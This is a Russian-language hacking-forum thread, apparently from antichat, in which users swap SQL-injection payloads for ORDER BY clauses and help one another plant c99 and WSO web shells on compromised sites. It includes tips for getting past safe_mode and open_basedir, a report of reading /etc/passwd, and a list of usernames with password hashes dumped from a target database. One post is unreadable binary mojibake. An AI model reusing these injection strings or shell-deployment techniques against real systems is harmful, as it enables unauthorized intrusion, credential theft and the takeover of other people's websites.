Ваши вопросы по уязвимостям.

Вот такие:

select ... from ... where ... order by (select+if(substring(version(),1,1)=4,1,(select 1 union select id)))

Пост
http://forum.antichat.ru/showpost.php?p=507099&postcount=10

Ну и вообще весь материал почитай

 

2jokester ожидал))
вот только проблема что там префикс подставляется

т.е. в order никак не залезть. вот и проблема.

смысл понятен из того поста.
вот и в этой ситуации что можно добавить в запрос чтобы выполнить эти функции уже после ...order by act_id

 

Узнай имя колонки (подбери (насколько я понял, в твоём случае правильный линк (без инъекции) будет содержать имя столбца)), а дальше как в статье (п 3.4):

https://forum.antichat.ru/showpost.php?p=407227&postcount=3

 

2Grey случай у меня запущенный...
таблица пустая. непонять какая сортировка будет(
и select .. from .. where .. order by act_id (вот после этого можно что нить вставлять)

немного прояснилось но не до конца)
можно использовать несколько столбцов после order by(.. order by id,login, ..)

теперь такая конструкция:
select .. from .. where .. order by act_id,(select+if(2=1,1,(select 1 union select act_id)))

второе выражение тоже должен проверять но не появляется ошибки(
хотя: select .. from .. where .. order by act_id,1000 вызывает ошибку

сидел думал...)
такая конструкция -
order by act_id,(select+if(2=1,1,1000)) начнет сортироватся и по 1000 столбцу и должна вылететь ошибка но ее нет(
в чем проблема?

 

j0ker13

Насколько я понимаю, если в параметр ORDER BY мы помещаем выражение, то нужно чтоб оно возвращало именно имя колонки, по которой должна происходить сортировка, а не ее номер.

 

order by act_id,if(substring(version(),1,1)=4,1,(select+column_name+from+information_schema.columns))

more than 1 row

Это пример, я понимаю что у тебя 4 ветка, но сути это не меняет и должно работать, надеюсь принцип понятен

 

Тогда лучше получать море ван роу, руками, как писал др. Зиро: (select 1 union select 2), а не выводом из таблицы.

 

Ну это без разницы конечно. Я просто на локалке как тестил, так и скопировал. Поэтому и написал, что пример. Главное что-бы принцип был понят

 

Люди,большая проблема.Залил с99 шелл(не придираться,убью наф).И вот,выдало:

‹д=щsЪHЦ?OЄт?ј!•Њ=Дa;±10л;юЖЧШdІЩT*%¤TЦ`Ж›яэ{Ї[taЩЮљZ(ЫЁХпиwч!ьтE{дz·=bІЪmМ“aдyv•}чµq§r`™3Ѕjojі (вЄSсШќW#А]PFІг2Ї3СLХљёХFs«QЙАt&›C_Ж±1ік»гiћОєо€йъ?'“‰$›SЧx’г·kвы¦чщмЁытEпобштўWЅ9эчQ ¶mo.П.Ї[
+опќџћ}nБ�9ЄlК»?ц/?#°«8–®чe§:ђVU,Эrv»NЇЭШmw$гАўЌ:ЅгFЪp¤гЏ—СgCНлЎКОm.)П‘•ЫЊыІг$АPР8§-ш3”CпP"Ґ3'”д§ЈУ“Ѕ�–cИъn\јЌ:Йwпач“лЛЏ‡€ьЅъ~уэf$фЙHуXљИчТH„Sez§ЂCпи_ЅкбСБех^пфт‚АM†X[ѕykZ3.ќiж‹ёСd¬КTкаFЦ�л&А7Q‰єFP’{«™х{Ыr5OіМ–Ьw-Э'ЕL4Хµљхє}· }ЛAђVУѕ
©РЧС®° 6d0Уџ·
|ЂVGЊ¬СVЕw\„QЩ@цu4—±жj}MЧјik¤©*3wчAW€ъ‰9 -»Ќ‡ЌН->†E^A0Њ бР|ПіLтсЭe†ўЮM°|ГXР=rйdзy{ВL6–ЯВћЈ‘NyWы‹qO!QЋ„XHДє‡бЮЫІЄjж°ЄіЃЧjрЃ„M%‡ЯэЎ™¶пЭ/Џ1ЉO1’<ц…чЏщkЃнћ<І yY6ЇЮсЧоємщщ( 9?=—йLyF‰Z6™/<AmаИ{F‚6Ьџп]џњ^T{—W-аv4м_цz—зAЫЩйЕQхC[хЧ?ъєҐЬ~ч-ЏЭ/с4ЗГЃе;sЮВ±vЗФИЭK@aµ·CпИ›ђ3vБђќЎfV=Лћoи[h}F ¶bmВя`#ЦДЅ6©%
A¬ыпч›ыu4eKќѕхФ·ЮозщЏrLўоР{>`4PHB'P© еэxщBrЅ©О
3Хс»ШВQND87[e›rf,Йt‰Ё\$€д8Т“пуxPnb*§їuBЃP”m’јyзЭ,–њЛg¤ј ЎхТС#[%™/ў№МШ• юҐrБ¤\(µg‡б…ЕJћPЮ+зЭўЂ3Е3hщ"Сµњ$џ>°6ЗЌoy&RdnUАg кЁKEpc+ЫеН=s}®\p/VЛЇD €Y_€hO<.™(ћѕъ+7щ[Pњb^KO?
(–KGР\з,’СJзи"±Їdњ)]DжЉІЛyЪ,gЉ¤У/‘>’[>ГЊд±"v./Џж .Ы”.µry)_Юљ¶_Ш_БHУW>і,eUoIЉ}…‹іщ?%Г@ЎІшб)ю©iщн–мІЊ-cлйqюdжЪвЋшx5ИњpЉ.�<Нџ¬€»’Щ<’k‡ќ‚=thЧh‹ЅыЖм»ц.нД·kЮ€~9БvїЪmЫб:QA±vo¬Ѓ7‘Цp{¶¬ЊX)5Ґ X;`¦wyі.A[†‘ГќКoІвuм‘™«ћм ™Ч©|ллІyЛсµэоХ‡«Ъ–ФђЮµk>±‡?2яc-Ѓ‘©л1NqАЛ™fъwћKощT%З‡¦фNjlWлНmЧ“ыхwu© Їps~=џБяЙ&46 Qo57[х8їщљuьp·эоЫ»НVъЭCН•ы:Saа› ќ†r©K
h81 ЖМоЕеЕСLфI#щДЂЉаN«|ј>KБtyW!v№fC …аАP·ъІо¶€d
…уйНEHЅo’zЈ\»—ЗЗqґW–л!’‚Ѕ/YСYNOИ7yАЄ†Ґ†жё„лЦ\¦[Џ, ЩњЕкоµуєyьЖµЇS—9±Zd›‰}ЗІіЃM…Ђ&“Й"(6:ЎфЭ%тјх!hfqОо”ЖK‡иUKYb;lLљ!Щ%СС6яќ`ћїUГЧј«ѕct"hј“љЫpІЦЈ}XЫnH›НЧл±ћџ-Я
НnE‘’xmХjЫM©±Сђuьinuз/‰GЁВ sиu›[Тv7~FTо{3qўFњќ/,ѓ}M—C Ќ9=ёLv”Q]p|№бxV$ОLЅЮ)OэH Z‘јнX s]VКW!ЄYxцw_SnыЋп±тlч®`џPБ±е(+ „
9pл¦јо2eЧUYщ®?њБ№lbЫЄ’`c№э7„ S«9LVљОЦ~©1O©ЩІлNФ_ЦwіЕNЂ…ђх®И!ќЕUљ}zкжА2M¦Гў;xSґ—_Їч‘HНwќЩќ–ДҐ5є
·щu`%| 1пk74ЌА.™¬гDЄj

В папке нету .htaccess(точнее есть,но он с .txt расширением,что не берётся в рассчёт).В disable_functions стоит no value,но вот функции system(),exec() не работают почему-то,но функция phpinfo() работает.Ветка РНР пятая.В чём может быть проблема ?

Права на фаил: -rw-r--r--.Не вижу проблемы,ибо шеллы запускаются и с r правами(

 

.htaccess ограничивающий запуск php-скриптов может быть и выше, вообще в самом-самом корне, если нет .htaccess папкой ниже с пересекающимися функциями однотипными - то все распространяется на вложенные подпапки.

Ну или php вообще не установлен никак, допустим юзают только perl

 

Нет,РНР однозначно установлен+phpinfo() выполняется...А если один .htaccess ,который расположен ниже,снимает все запреты(не вжнок акие),а верхний,наоборот,ставит,то в результате запреты будут стоять ?

 

нет, если инструкции касаются одного и того же - будет работать "ближайший" .htaccess

(если он не ниже папки со скриптом, а как минимум в ней же или выше)

 

Code:

В корне стоит только такой .htaccess:

RewriteEngine On
Options +FollowSymlinks
RewriteBase /
RewriteRule ^(.*)\.php/(.*)/(.*)/(.*)/(.*)/(.*)/(.*)$ /$1.php?$2=$3&$4=$5&$6=$7 [L]
RewriteRule ^(.*)\.php/(.*)/(.*)/(.*)/(.*)$ /$1.php?$2=$3&$4=$5 [L]
RewriteRule ^(.*)\.php/(.*)/(.*)$ /$1.php?$2=$3 [L]

Я так понимаю,что это какие-то преобразования,но это меня не затрагивает(хоть я и не знаю,что именно тут происходит).Ещё варианты ? Напоминаю: phpinfo() выполняется,а значит,и РНР исполняется...

 

значит смени шелл)) Возьми тот же WSO - нехрен выё, пробовать надо разные варианты всегда. Вот у меня сегодня тоже с99 (правда 100% нормальный) не сработал, а WSO - сработал. Честное благородное слово

 

другие шеллы лил?если они пашут, значит возможно gzinflate - читай что это и вникай, любитель с99....
если нет - то это настройка веб-сервера, пробуй др.диру или шелл попроще.

 

ХАХ)))) Заработал WSO)))))))))))))))))))))).М.......магия!))))))))))))))))))))

Вот только... httpdocs/images/ u--------- [ home ]

Can't open this folder! А ведь у неё прова-то полные:Д

Пардон опять...там open_basedir.WSO обходит его? Но вот почему тогда список файлов не выдаёт,ведь ограничение должно рабортать.если я перейду выше httpdocs

ЗЫ: Облом короче,при чём - полный.Он ни список файлов не может получить,ни lsattr и ls - la не работают.Даже не знаю,что и делать./etc/passwd вообще не прочитать.

ЗЫ: SAFE MODE = ON; OPEN_BASEDIR = ON.Вот я попал...

 

Хм,прочитать фаил /etc/passwd я смог с помощью ini_restore() в шелле,но вот странно,почему он не читает файлы с правами -rw-r--r--.Open_basedir тут не должен распространяться,ибо он действует на диры,расположенные как раз выше искомой директории...фаил .html формата.Странно-странно,хотя функция работает

 

всем привет :Вообшем пароли в базе хранятсо в таком виде тут Userass вообшем эт ппц мозг через порты ввода вывода вытекает что ЭТО ??? 539a44165e ?
-------------------------------------
simonwest:539a44165e
--------------------------------------------------------------------------------------------
daniel:a104ee6c66
---------------------------------------------------------------------------------------------
dn:ae8fc55ccd:
-------------------------------------------------------------------------------------
Вот ссылка на саму иньекцию :
http://forum.antichat.ru/threadedpost1313149.html#post1313149

 

да что угодно, например substr(md5("pass"),0,10)

 

Велемир, кажется это гз, но я могу ошибаться.